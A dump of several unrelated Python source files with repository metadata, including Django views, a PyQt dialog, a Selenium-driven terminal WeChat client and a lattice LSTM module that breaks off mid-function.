"type" : None,
"ratio" : {},
"top" : []
}
try:
cnx = connect(**base)
svms, ngrams = select_last_weights(cnx)
indexes = select_indexes(cnx)
predict = Predict(svms, indexes, ngrams)
uid = predict.text([text]).pop()
predict.calc()
data["type"] = predict.type(uid)
data["ratio"] = predict.ratio(uid)
data["top"] = predict.top()
except:
pass
finally:
data = json.dumps(data)
print(data)
exit(0)
|
[
"lemfaer@gmail.com"
] |
lemfaer@gmail.com
|
55b5d85be3348bd45f1b520c279dea3e7d9c7f02
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_chancing.py
|
39d3766b4c248139ad54c2197c4e7174569df972
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
from xai.brain.wordbase.verbs._chance import _CHANCE
#calss header
class _CHANCING(_CHANCE, ):
def __init__(self,):
_CHANCE.__init__(self)
self.name = "CHANCING"
self.specie = 'verbs'
self.basic = "chance"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f49a1d86de2af8ee7a8b700298597fa86773f976
|
b6b3c01f29eb4ca0b4a11a12b7844c7971dd936c
|
/reddit_comments/views.py
|
2b6e51522817625656efb7677fda31f6a49521e1
|
[] |
no_license
|
jjmalina/trollolol
|
b3bfbbadfba8f55c84727d0cf412d26e66620996
|
e9831f95dbd45317f4f4905e9fd009094556d6e3
|
refs/heads/master
| 2020-11-26T21:10:16.863955
| 2013-04-02T22:54:08
| 2013-04-02T22:54:08
| 6,016,385
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import simplejson as json
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from reddit_comments.models import Submission, Comment
def index(request):
submissions = []
for submission in Submission.find():
item = {'submission': submission, 'comments': []}
for comment in submission.comments:
item['comments'].append(comment)
submissions.append(item)
context = {'submissions': submissions}
return render(request, 'reddit_comments/index.html', context)
@csrf_exempt
def classify_comment(request):
"""Ajax view when the user classifies the comment themself"""
data = json.loads(request.POST['classify'])
label = data['label']
object_id = data['objectId']
comment = Comment.find_one({'object_id': object_id})
comment.is_troll = label
comment.is_classified = True
comment.save()
response = {
'status': 'success',
'label': label,
'objectId': object_id
}
return HttpResponse(json.dumps(response))
|
[
"jmalina327@gmail.com"
] |
jmalina327@gmail.com
|
616423f2f0453fe8f46d5f221992ce4636cbc09a
|
6aee8f6182b2cf15d5c6ddc742b3f2e17a261442
|
/parser.py
|
74d54cbe33d152f68d442caae46803b4ca5392d5
|
[] |
no_license
|
StanislavNesterovich/parser
|
9f80950966dc72a23b6a6d0cc96520cdcb1aab58
|
cc568939c182eb2865bee4c2c86fbffa6f70315a
|
refs/heads/master
| 2020-04-19T12:39:02.416525
| 2019-07-31T12:15:18
| 2019-07-31T12:15:18
| 168,197,702
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
py
|
import yaml
with open("document.yaml", 'r') as stream:
try:
a = (yaml.load(stream))
except yaml.YAMLError as exc:
print(exc)
print a["defaults"]
print a["defaults"]["volumes"]
for i in a["defaults"]["volumes"].keys():
print i
print a["defaults"]["volumes"][i]
|
[
"stanislau.nestsiarovich@netcracker.com"
] |
stanislau.nestsiarovich@netcracker.com
|
a5f0ed870c87007fcf9f22bae53d58e56ed5e7dd
|
dda6c484dde9bf5c59473d44c5e934487f13b0ea
|
/textils/textils/wsgi.py
|
1d8abc0c4d6d536778a66638f058cebfb8cc51bc
|
[] |
no_license
|
shreyasingh12/Django-Project
|
439e83f95740a58ed15f28fda7b16ae6af206a23
|
07c1bbe7c19dc12abc3109b02b9b1ea10cfa6170
|
refs/heads/master
| 2021-06-13T04:41:45.141103
| 2020-04-10T09:31:39
| 2020-04-10T09:31:39
| 254,424,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for textils project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'textils.settings')
application = get_wsgi_application()
|
[
"sshreya0003@gmail.com"
] |
sshreya0003@gmail.com
|
e3af2107bc4abb9ae14e143512c4ae6befccfb9a
|
6402c19d74b278064d7672cb15b50e549cc79f36
|
/message.py
|
5359883d46536ca1ac0ecb21229ec60c91b6bdaf
|
[] |
no_license
|
rifiuto/pyqt
|
5e46954e3361a78c36308380d0a38a49536c8fa5
|
40300b63f4854379c17015f3826de1801eb0a665
|
refs/heads/master
| 2023-09-03T22:06:48.700310
| 2021-11-09T15:18:21
| 2021-11-09T15:18:31
| 425,777,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 702
|
py
|
import sys
from PyQt5.QtWidgets import QWidget, QApplication, QMessageBox, QDesktopWidget
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.resize(400, 400)
self.show()
def closeEvent(self, event):
reply = QMessageBox.question(self, 'message', "Do you want to quit",\
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def main():
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
[
"sayno@rifiuto.localdomain"
] |
sayno@rifiuto.localdomain
|
1ca06445b4a6681d07bd80c25c813c17a9d99f3b
|
0cc4eb3cb54f8394c127ace62d3108fdb5230c85
|
/.spack-env/view/lib/python3.7/encodings/utf_32_be.py
|
fcf11fbab5dd8d16c2cb243fe427707815df6409
|
[] |
no_license
|
jacobmerson/spack-develop-env
|
5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8
|
5fca20ca343b1a76f05fc635c87f94ed25417d94
|
refs/heads/master
| 2022-07-04T02:22:50.264727
| 2020-05-06T05:13:50
| 2020-05-06T05:13:50
| 261,657,112
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
/lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/python-3.7.7-oihhthdoxtgh4krvzpputn5ozwcnq2by/lib/python3.7/encodings/utf_32_be.py
|
[
"mersoj@rpi.edu"
] |
mersoj@rpi.edu
|
8184744e49878c1d75bddc0aecfa8c735b903048
|
fced246b0bf2e7ca0ddfe32d71bcae008b98bb42
|
/migrations/__init__.py
|
8f982d30238f9f4e8a4d0e11bee0db2439d80d6d
|
[] |
no_license
|
jackscodemonkey/reads_db
|
b0af2231213977a7670876dd4c2beed60b0182ae
|
13e433652fce648a95704badb261b3ca2a771d8c
|
refs/heads/main
| 2023-01-03T10:18:41.756971
| 2020-11-04T01:39:29
| 2020-11-04T01:39:29
| 309,837,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 41
|
py
|
__version__ = '1.0'
__release__ = '1.0.0'
|
[
"marcus.robb@initworx.com"
] |
marcus.robb@initworx.com
|
055d26a5da7e57c84e37a554e274c996150f4e8e
|
673af02550d4d26ff0a8bcecb4175a0a6b24378f
|
/appointment_scheduler.py
|
1c406595a6f8f529c269ed169101d9717670e388
|
[] |
no_license
|
OMRYZUTA/Appointments
|
1cb0665638bffcd1f48163b7646b2a29ec52f9e2
|
26f00da30c7600406b0196782eb244694f3e8509
|
refs/heads/master
| 2023-08-20T02:27:45.436806
| 2021-06-25T07:04:54
| 2021-06-25T07:04:54
| 378,819,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,404
|
py
|
from db_connector import DbConnector
from login_system import LoginSystem
class AppointmentScheduler():
def __init__(self):
doctors_list = DbConnector.get_doctors_list()
self.doctors_list = list(map(
lambda x: LoginSystem.doctor_log_in(x[0], x[1]), doctors_list))
self.doctor_dict = dict(
map(lambda x: (x.user_name, x), self.doctors_list))
def get_available_doctors(self):
return list(filter(lambda x: not x.is_busy, self.doctors_list))
def make_appointment(self, doctor_user_name, patient):
treated = self.doctor_dict[doctor_user_name].try_treat(patient)
result = 'entered to waiting list'
if(treated):
result = 'being treated'
return result
def cancel_appointment(self, doctor_user_name, patient):
removed = False
if(patient.remove_from_waiting_list(doctor_user_name)):
treated = self.doctor_dict[doctor_user_name].waiting_list.remove_patient(
patient)
result = 'removed from waiting list'
else:
result = "already began the appointment, can't cancel"
return result
def is_doctor_exist(self, doctor_user_name):
return doctor_user_name in self.doctor_dict.keys()
def get_doctor_waiting_list(self, doctor_user_name):
return self.doctor_dict[doctor_user_name].waiting_list
|
[
"omrizu@mta.ac.il"
] |
omrizu@mta.ac.il
|
aed104fefaad1dcac7d795078c44b562c6e58c95
|
c546ea8fe008f2cb11e9b7dfa2e5220ee6601c7b
|
/read_rss.py
|
32277004a840cb131caae29bbf5d461df4744da6
|
[] |
no_license
|
MariaChowdhury/Parser
|
df535de2ce5d3d92ee9a42d6ba5f87f49135e87a
|
c516b95bb9fc574cefea7086af1d236d09a7075b
|
refs/heads/master
| 2020-03-29T18:04:46.807570
| 2018-09-25T02:03:25
| 2018-09-25T02:03:25
| 150,193,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,163
|
py
|
#Python code to illustrate parsing of XML files
# importing the required modules
import csv
import requests
import xml.etree.ElementTree as ET
def loadRSS():
# url of rss feed
url = 'https://onlinebooks.library.upenn.edu/newrss.xml'
# creating HTTP response object from given url
resp = requests.get(url)
# saving the xml file
with open('onlinebooks.xml', 'wb') as f:
f.write(resp.content)
def parseXML(xmlfile):
# create element tree object
tree = ET.parse(xmlfile)
# get root element
root = tree.getroot()
# create empty list for news items
newsitems = []
# iterate book item
for item in root.findall('./channel/item'):
print(item)
# empty news dictionary
# append news dictionary to news items list
newsitems.append(item)
# return news items list
return newsitems
def main():
# load rss from web to update existing xml file
loadRSS()
# parse xml file
newsitems = parseXML('onlinebooks.xml')
# store news items in a csv file
#savetoCSV(newsitems)
if __name__ == "__main__":
# calling main function
main()
|
[
"maria.chowdhury@gmail.com"
] |
maria.chowdhury@gmail.com
|
f46004245901b5a26d8f52428fb53ff149b9c996
|
3c0458db82bc58ac57820fc82291ecadfa99458f
|
/wechit.py
|
d54b71d4396caa9ed9d9d844dc4ace5e5d9dbe35
|
[
"MIT"
] |
permissive
|
user01010011/wechit
|
1bce91723ba62e15489bdd8110ba10c7174e001d
|
18de1a3bc23691cd6faa859181384822bc46b813
|
refs/heads/master
| 2022-04-13T22:11:15.602716
| 2020-02-27T04:03:21
| 2020-02-27T04:03:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,381
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import time
from PIL import Image, ImageOps, ImageStat, ImageEnhance
import os
import sys
from glob import glob
import re
import json
import random
import shutil
IS_PYTHON3 = sys.version_info > (3, 0) # supports python 2 and 3
LOGIN_SCREEN_FILE = "./temp/login-screen.png" # temp file for qr code
MSG_IMG_FILE = "./temp/msg-img.png" # temp file for in-chat images
IS_RETINA = True # mac with a retina display?
# terminal window dimensions
TERM_ROWS = 24
TERM_COLUMNS = 80
# chrome driver settings
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("safebrowsing-disable-extension-blacklist")
chrome_options.add_argument("--safebrowsing-disable-download-protection")
chrome_options.add_experimental_option("prefs", {'safebrowsing.enabled': 'false'})
if IS_PYTHON3:
unicode = str # in python 3, unicode and str are unified
# welcome!
def print_splash_screen():
icon = """
---------------------------------------------------------------------
_________
| ___ |
|( oo)___ | WECHIT - WECHat In Terminal
| v-/oo )|
| '--\| | Powered by python + selenium, (c) Lingdong Huang 2018
'---------'
---------------------------------------------------------------------
"""
iconcolor = """
?????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????
?#########???????????????????????????????????????????????????????????
?#########????@@@@@@@????????????????????????????????????????????????
?#########???????????????????????????????????????????????????????????
?#########??????????????????????????????????????&&&&&&&&&&&&&&&&&&&??
?????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????
"""
g = lambda s: color_text(s,37,42)
w = lambda s: color_text(s,32,40)
b = lambda s: color_text(s,30,47)
p = lambda s: s
result=""
for t0,t1 in zip(icon.split("\n"),iconcolor.split("\n")):
for c0,c1 in zip(list(t0),list(t1)):
result += g(c0) if c1 == "#" else (w(c0) if c1 == "@" else (b(c0) if c1 == "&" else p(c0)))
result += "\n"
return result
# initialize chrome driver and navigate to "WeChat for Web"
def init_driver(path=os.path.join(os.getcwd(),"chromedriver")):
driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=path)
driver.get("https://web.wechat.com")
return driver
# observe and update terminal dimensions
def get_term_shape():
global TERM_ROWS, TERM_COLUMNS
if IS_PYTHON3:
result = tuple(reversed(list(shutil.get_terminal_size((TERM_COLUMNS, TERM_ROWS)))))
else:
result = tuple([int(x) for x in os.popen('stty size', 'r').read().split()])
TERM_ROWS,TERM_COLUMNS = result
return result
# retrieve a function for mapping RGB values to ANSI color escape codes
def get_color_mapper(file):
dat = json.loads(open(file,'r').read())
color_map = {tuple([int(y) for y in x.split(" ")]):dat[x] for x in dat}
def nearest(r,g,b):
d0 = None
k0 = None
for k in color_map:
d = (k[0]-r)**2+(k[1]-g)**2+(k[2]-b)**2
if k0 is None or d <= d0:
k0 = k
d0 = d
return color_map[k0]
return nearest
color_mapper = get_color_mapper("colormap.json")
# apply ANSI color escape codes
def color_text(s,fg,bg,bold=True):
format = ';'.join([str(int(bold)), str(fg), str(bg)])
return '\x1b[%sm%s\x1b[0m' % (format,s)
# remove ANSI color escape codes
def uncolor_text(s):
s = re.sub(r"\x1b\[.*?;.*?;.*?m", "", s)
s = re.sub(r"\x1b\[0m","",s)
return s
# num of characters in width when given string is printed in terminal
# chinese characters are typically 2, ascii characters are 1
def rendered_len(s):
while True:
try:
return sum([(1 if ord(x) < 256 else 2) for x in unrender_unicode(uncolor_text(s))])
except:
try:
return sum([(1 if ord(x) < 256 else 2) for x in uncolor_text(s)])
except:
return rendered_len(s[:-1])
# draw a box made of ASCII characters around some text (auto wraps)
def box_text(s,caption="",w=40,fg=30,bg=42):
iw = w-4
lines = s.split("\n")
result = ".-"+caption[:w-4]+("-"*(iw-rendered_len(caption)))+"-."+"\n"
def strslice(s,n):
for i in range(len(s)*2):
if rendered_len(s[:i]) >= n:
return s[:i], s[i:]
return s,''
def renderline(l):
a,b = strslice(l,iw)
return "|"+color_text(" "+a+(" "*max(0,iw-rendered_len(a)))+" ",fg,bg)+"|" \
+ ("\n"+renderline(b) if b != "" else "")
result += "\n".join([renderline(l) for l in lines])
result += "\n'-"+("-"*iw)+"-'"
return result
# draw a box around some ASCII art
def box_image(im,w=40,caption=""):
iw = w-4
s = print_thumbnail(im,width=iw)
lines = [l for l in s.split("\n") if len(l) > 0]
result = ".-"+caption+("-"*(iw-rendered_len(caption)))+"-."+"\n"
def renderline(l):
return "| "+l+" |"
result += "\n".join([renderline(l) for l in lines])
result += "\n'-"+("-"*iw)+"-'"
return result
# align block of text 'left' or 'right' or 'center' by padding whitespaces
def align_text(s,w=80,align="left"):
lines = s.split("\n")
result = ""
for l in lines:
n = (w-rendered_len(l))
sp = " "
if align == "left":
result += l+sp*n
elif align == "center":
result += (sp*(n//2))+l+(sp*(n-n//2))
elif align == "right":
result += (sp*n)+l
result += "\n"
return result
# convert a PIL image to ASCII art
def print_image(im, x_step=12, y_step=24, calc_average=False):
W,H = im.size
result = ""
for i in range(0,H,y_step):
for j in range(0,W,x_step):
if calc_average:
roi = im.crop((j,i,min(W-1,j+x_step),min(H-1,i+y_step)))
col = ImageStat.Stat(roi).mean
else:
col = im.getpixel((min(W-1,j+x_step//2),min(H-1,i+y_step//2)))
conf = color_mapper(*(col[:3]))
result += color_text(*conf)
result += "\n"
return result
# convert a PIL image to ASCII art given output width in characters
def print_thumbnail(im,width=64):
W,H = im.size
x_step = int(float(W)/width)
y_step = x_step * 2
converter = ImageEnhance.Color(im)
im = converter.enhance(2)
return print_image(im,x_step=x_step,y_step=y_step,calc_average=False)
# get bounding box of html element on screen
def get_rect(elem):
s = 1+IS_RETINA
rect = elem.location['x']*s, elem.location['y']*s, (elem.location['x']+elem.size['width'])*s, (elem.location['y']+elem.size['height'])*s
return rect
# fetch login QR code as PIL image
def get_qr_code(driver):
os.system("rm "+LOGIN_SCREEN_FILE)
print("retrieving qr code...")
driver.get_screenshot_as_file(LOGIN_SCREEN_FILE)
qrelem = driver.find_element_by_class_name("qrcode").find_element_by_class_name("img")
rect = get_rect(qrelem)
while len(glob(LOGIN_SCREEN_FILE)) == 0:
time.sleep(0.5)
im = Image.open(LOGIN_SCREEN_FILE).crop(rect)
if abs(im.getpixel((1, 1))[0] - 204) < 10:
print("qr code is still loading, trying again...")
time.sleep(1)
return get_qr_code(driver)
print("qr code retrieved!")
return im
# convert QR code to ASCII art
def print_qr_code(im):
black_token = color_text(" ",37,40)
white_token = color_text(" ",30,47)
im = im.resize((540,540))
uw = 12
icnt = 38
W,H = im.size
pad = (W-uw*icnt)//2
result = ""
for i in range(icnt):
result += white_token
for j in range(icnt):
x,y = pad+uw*j, pad+uw*i
b = im.getpixel((x+uw//2,y+uw//2))[0] < 128
if b:
result += black_token
else:
result += white_token
result += white_token+"\n"
whiterow = white_token*(icnt+2)
return whiterow+"\n"+result+whiterow+"\nscan to log in to wechat"
# universal method for querying user for string input
def ask_for(q):
if IS_PYTHON3:
return input(q)
else:
return raw_input(q)
# wait for chat window to load (right after logging in)
def wait_for_chat_window(driver):
while True:
try:
if len(get_username(driver)) > 0:
return
except:
pass
time.sleep(0.5)
# convert formatted unicode entry points to unicode characters
def render_unicode(s):
return re.sub(r"\\u.{4}", lambda x: chr(int(x.group(0)[2:],16)), s)
# decode unicode
def unrender_unicode(s):
if IS_PYTHON3:
return s
return s.decode("utf-8")
# remove wechat-specific emoji's
def no_emoji(s):
return re.sub(r"<img.*>", "*", s)
# sends both 'enter' and 'return' key multiple times to make sure wechat get it
def send_enter(elem):
for i in range(5):
time.sleep(0.1)
elem.send_keys(Keys.ENTER)
elem.send_keys(Keys.RETURN)
# get my own username
def get_username(driver):
return render_unicode(no_emoji(
driver.find_element_by_class_name("give_me").find_element_by_class_name("display_name").get_attribute("innerHTML")
))
# get a list of recent conversation partners
def list_conversations(driver):
names = []
while len(names) == 0:
try:
names = driver.find_element_by_id("J_NavChatScrollBody").find_elements_by_class_name("nickname_text")
except:
pass
names = [x.get_attribute("innerHTML") for x in names]
names = [render_unicode(no_emoji(name)) for name in names]
return names
# start a conversation with someone
# (immplementation: search their name in the search bar and press enter)
def goto_conversation(driver, name="File Transfer"):
search = driver.find_element_by_id("search_bar").find_element_by_class_name("frm_search")
search.send_keys(name)
send_enter(search)
return driver.find_element_by_id("chatArea").find_element_by_class_name("title_name").get_attribute("innerHTML")
# get a list of recent messages with current friend
def list_messages(driver):
elems = driver.find_element_by_id("chatArea").find_element_by_class_name("chat_bd").find_elements_by_class_name("message")
msgs = []
for e in elems:
try:
author = render_unicode(no_emoji(e.find_element_by_class_name("avatar").get_attribute("title")))
content = e.find_elements_by_class_name("content")[-1]
except:
continue
message = ""
txts = content.find_elements_by_class_name("js_message_plain")
pics = content.find_elements_by_class_name("msg-img")
if len(txts) > 0:
message = txts[0].get_attribute("innerHTML")
elif len(pics) > 0:
driver.get_screenshot_as_file(MSG_IMG_FILE)
rect = get_rect(pics[0])
im = Image.open(MSG_IMG_FILE).crop(rect)
message = im
else:
message = "<!> message type not supported. please view it on your phone."
msgs.append((author,message))
return msgs
# render message history as ASCII art
def print_messages(msgs, my_name="", cols=80):
result = ""
for i in range(len(msgs)):
author = msgs[i][0]
message = msgs[i][1]
if author == my_name:
align,fg,bg = "right",30,42
else:
align,fg,bg = "left", 30,47
if type(message) in [str, unicode]:
result += align_text(box_text(message,w=min(cols,64,rendered_len(message)+4),caption=" "+author+" ",fg=fg,bg=bg),w=cols,align=align)+"\n"
elif type(message) is Image.Image:
result += align_text(box_image(message,w=min(cols,64),caption=" "+author+" "),w=cols,align=align)+"\n"
return result
# send plain text message to current friend
def send_message(driver, msg="Hello there!"):
field = driver.find_element_by_class_name("box_ft").find_element_by_id("editArea")
field.send_keys(unrender_unicode(msg))
send_enter(field)
# send file to current friend by full path
def upload_file(driver,file_path):
btn = driver.find_element_by_class_name("box_ft").find_element_by_class_name("js_fileupload")
try:
inp = btn.find_element_by_class_name("webuploader-element-invisible")
inp.send_keys(file_path)
return True
except:
return False
# download all the recent files
# chromedriver seems to bug out in this when in headless mode
def download_files(driver):
elems = driver.find_element_by_id("chatArea").find_element_by_class_name("chat_bd").find_elements_by_class_name("message")
for e in elems:
try:
content = e.find_elements_by_class_name("content")[-1]
except:
continue
pics = content.find_elements_by_class_name("msg-img")
atts = content.find_elements_by_class_name("attach")
while True:
try:
if len(pics) > 0:
pics[0].click()
down_clicked = False
while True:
try:
time.sleep(0.1)
close_btn = driver.find_element_by_class_name("J_Preview").find_element_by_class_name("img_preview_close")
down_btn = driver.find_element_by_class_name("J_Preview").find_elements_by_class_name("img_opr_item")[1]
if not down_clicked:
down_btn.click()
down_clicked = True
time.sleep(0.1)
close_btn.click()
print("image download initiated.")
break
except:
pass
if len(atts) > 0:
while True:
try:
atts[0].find_element_by_class_name("opr").find_element_by_class_name("ng-scope").click()
print("generic attachment download initiated.")
break
except:
pass
break
except:
pass
return True
# main app
def main():
get_term_shape()
print(print_splash_screen())
get_term_shape()
if TERM_ROWS < 50 or TERM_COLUMNS < 80:
print("your terminal window ("+str(TERM_COLUMNS)+"x"+str(TERM_ROWS)+") is too small. please resize it to 80x50 or larger.")
ask_for("press enter to continue...")
print("initializing driver...")
driver = init_driver()
time.sleep(1)
im = get_qr_code(driver)
get_term_shape()
print(align_text(print_qr_code(im),w=TERM_COLUMNS,align="center"))
wait_for_chat_window(driver)
print("logged in as \""+get_username(driver)+"\"! loading chats...")
sugs = list_conversations(driver)
print("welcome!")
print("who would you like to harass today? here are some suggestions: ")
print("\n".join([" - "+x for x in sugs]))
while True:
ret_name = ""
while len(ret_name) == 0:
req_name = ask_for("enter contact's name: (`:q` to quit) <")
if req_name == ":q":
driver.close()
return
ret_name = goto_conversation(driver, req_name)
if len(ret_name) == 0:
print("sorry. you don't have a contact of that name. please try again. ")
print("ok. now you're chatting with someone called \""+render_unicode(no_emoji(ret_name))+"\"")
while True:
get_term_shape()
print("retrieving messages...")
msgs = list_messages(driver)
print("rendering messages...")
print("\n"*TERM_ROWS+print_messages(msgs, my_name=get_username(driver),cols=TERM_COLUMNS))
print("type your message below: (`:ls` to list recent messages, `:up /path/to/file` to upload, `:down` to download all attachments, `:q` to exit chat)")
print("-"*TERM_COLUMNS)
ent = ask_for("to "+color_text("["+render_unicode(no_emoji(ret_name)+"]"),30,47)+" <")
if ent == ":q":
break
elif ent.startswith(":up"):
pth = " ".join(ent.split(" ")[1:])
print(["upload failed! check you file path", "upload success!"][int(upload_file(driver, pth))])
elif ent.startswith(":down"):
download_files(driver)
elif ent != "" and ent != ":ls":
print("sending message...")
send_message(driver,ent)
if __name__ == "__main__":
main()
print("good day.")
|
[
"admin@admins-MacBook-Pro-voice-theatre.local"
] |
admin@admins-MacBook-Pro-voice-theatre.local
|
77bcd921aa4b5c8e9433f39362172a8287c4cba5
|
a845841285321224801e107d23fe72e189121eb3
|
/src_mulan/modules/latticelstm.py
|
7a01fd3ecca31e393b34f9562636a21a44a16819
|
[] |
no_license
|
ylwangy/Lattice4LM
|
22e330db539dfb33ef329d4564c4efe2d5fd71c1
|
7228c52276774569b28efeb956fd6e455c60a7ca
|
refs/heads/master
| 2020-06-19T02:17:18.147252
| 2019-11-07T06:30:47
| 2019-11-07T06:30:47
| 196,529,608
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,504
|
py
|
"""Implementation of batch-normalized LSTM."""
import torch
from torch import nn
import torch.autograd as autograd
from torch.autograd import Variable
from torch.nn import functional, init
import numpy as np
class WordLSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size, use_bias=True):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(WordLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.use_bias = use_bias
self.weight_ih = nn.Parameter(
torch.FloatTensor(input_size, 3 * hidden_size))
self.weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, 3 * hidden_size))
if use_bias:
self.bias = nn.Parameter(torch.FloatTensor(3 * hidden_size))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
init.orthogonal_(self.weight_ih.data)
weight_hh_data = torch.eye(self.hidden_size)
weight_hh_data = weight_hh_data.repeat(1, 3)
self.weight_hh.data.set_(weight_hh_data)
if self.use_bias:
init.constant_(self.bias.data, val=0)
def forward(self, input_, hx):
"""
Args:
input_: A (batch, input_size) tensor containing input
features.
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(input_.size(0), input_.size(1), *self.bias.size()))
weight_hh_batch = self.weight_hh.expand(batch_size, *self.weight_hh.size())
wh_b = torch.add(bias_batch, torch.bmm(h_0.expand(input_.size(1),*h_0.size()).transpose(1,0), weight_hh_batch))
weight_ih_batch = self.weight_ih.expand(batch_size, *self.weight_ih.size())
wi = torch.bmm(input_, weight_ih_batch)
f, i, g = torch.split(wh_b + wi, self.hidden_size, dim=2)
c_1 = torch.sigmoid(f)*c_0.expand(input_.size(1),*c_0.size()).transpose(1,0) + torch.sigmoid(i)*torch.tanh(g)
return c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class MultiInputLSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size, use_bias=True):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(MultiInputLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.use_bias = use_bias
self.weight_ih = nn.Parameter(
torch.FloatTensor(input_size, 3 * hidden_size))
self.weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, 3 * hidden_size))
self.alpha_weight_ih = nn.Parameter(
torch.FloatTensor(input_size, hidden_size))
self.alpha_weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, hidden_size))
if use_bias:
self.bias = nn.Parameter(torch.FloatTensor(3 * hidden_size))
self.alpha_bias = nn.Parameter(torch.FloatTensor(hidden_size))
else:
self.register_parameter('bias', None)
self.register_parameter('alpha_bias', None)
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
init.orthogonal_(self.weight_ih.data)
init.orthogonal_(self.alpha_weight_ih.data)
weight_hh_data = torch.eye(self.hidden_size)
weight_hh_data = weight_hh_data.repeat(1, 3)
self.weight_hh.data.set_(weight_hh_data)
alpha_weight_hh_data = torch.eye(self.hidden_size)
alpha_weight_hh_data = alpha_weight_hh_data.repeat(1, 1)
self.alpha_weight_hh.data.set_(alpha_weight_hh_data)
# The bias is just set to zero vectors.
if self.use_bias:
init.constant_(self.bias.data, val=0)
init.constant_(self.alpha_bias.data, val=0)
def forward(self, input_, c_input, hx):
"""
Args:
batch = 1
input_: A (batch, input_size) tensor containing input
features.
c_input: A list with size c_num,each element is the input ct from skip word (batch, hidden_size).
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)#5
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh)
wi = torch.mm(input_, self.weight_ih)
i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
i = torch.sigmoid(i)
g = torch.tanh(g)
o = torch.sigmoid(o)
if c_input[0] == []:
f = 1 - i
c_1 = f*c_0 + i*g
h_1 = o * torch.tanh(c_1)
else:
c_num = len(c_input[0])
c_input_var = torch.stack([torch.cat([c_input[i][j].unsqueeze(0) for j in range(len(c_input[i]))], 0) for i in range(batch_size)], 0)
# print(c_input_var)
alpha_mask = torch.ones(c_input_var.size(1),c_input_var.size(0),c_input_var.size(2))
for b in range(c_input_var.size(0)):
for n in range(c_input_var.size(1)):
if torch.equal(c_input_var[b,n,:],torch.zeros_like(c_input_var[b,n,:])):
alpha_mask[n,b,:] *= -1000000
alpha_bias_batch = (self.alpha_bias.unsqueeze(0).expand(batch_size, *self.alpha_bias.size()))
alpha_wi = torch.add(alpha_bias_batch, torch.mm(input_, self.alpha_weight_ih))
alpha_wi = alpha_wi.expand(c_num, *alpha_wi.size())
alpha_weight_hh_batch = (self.alpha_weight_hh.expand(batch_size, *self.alpha_weight_hh.size()))
alpha_wh = torch.bmm(c_input_var, alpha_weight_hh_batch)
alpha = torch.sigmoid(alpha_wi + alpha_wh.transpose(1,0))
alpha = alpha * alpha_mask.cuda()
alpha = torch.exp(torch.cat([i.unsqueeze(0), alpha],0))
alpha_sum = alpha.sum(0)
